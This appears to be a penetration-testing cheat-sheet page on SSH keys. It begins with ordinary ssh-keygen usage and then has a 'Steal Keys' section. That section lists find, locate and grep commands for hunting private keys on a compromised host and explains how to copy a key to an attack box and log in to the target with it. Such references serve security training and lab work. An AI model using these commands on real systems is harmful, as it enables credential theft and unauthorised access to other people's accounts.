SSH Keys
Generate Keys
ssh-keygen -t rsa -b 2048 -C "[email protected]"Key Type -t:
rsa: RSA key type.
dsa: DSA key type.
ecdsa: ECDSA key type.
ed25519: Ed25519 key type.
Key Length (-b):
Specify the number of bits in the key.
Comment (-C):
Add a comment to identify the key (usually an email address).
Output File (-f):
Specify the filename for the key pair.
Passphrase (-N):
Set a passphrase to protect the private key.
Passphrase (-P):
Requests changing the passphrase of a private key file instead of creating a new private key.
The program will prompt for the file containing the private key, for the old passphrase, and twice for the new passphrase.
Key Location: By default, keys are saved in ~/.ssh/ directory.
ssh-keygen -t rsa -b 2048 -C "[email protected]" -f ~/.ssh/id_rsaThis command generates an RSA key pair with a key length of 2048 bits and a comment of "[email protected]". The keys will be saved as id_rsa (private key) and id_rsa.pub (public key) in the ~/.ssh/ directory.
Steal Keys
Find Private Keys
find / -name id_rsa
System-wide search for key by name.
locate id_rsa
Searches for key using the locate command.
grep -r -l "BEGIN RSA PRIVATE KEY" /etc/
Search /etc/ for keys
find ~/.ssh -name "id_rsa*" -type f
Search in home dir
find /etc/ssh -name "id_rsa*" -type f
Search for system-wide keys
Find Public Keys
find / -name "*.pub"
System-wide search for key files by name.
locate "*.pub"
Searches for key files using the locate command.
grep -r -l "ssh-rsa" /etc/
Search /etc/ for keys
find ~/ -name "[filename].pub" -type f
Search in home dir
find ~/.ssh -name "id_rsa*.pub" -type f
Search in home dir
Display SSH host key information:
ls -l /etc/ssh/ssh_host*Look for .ssh and see if you can get the private key.
If you can, copy it to your attack box. Then change it's permissions:
chmod 600 root_keyUse the key to log in to that user that it belongs to.
ssh -i root_key -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa <user>@<targetIP>Last updated
Was this helpful?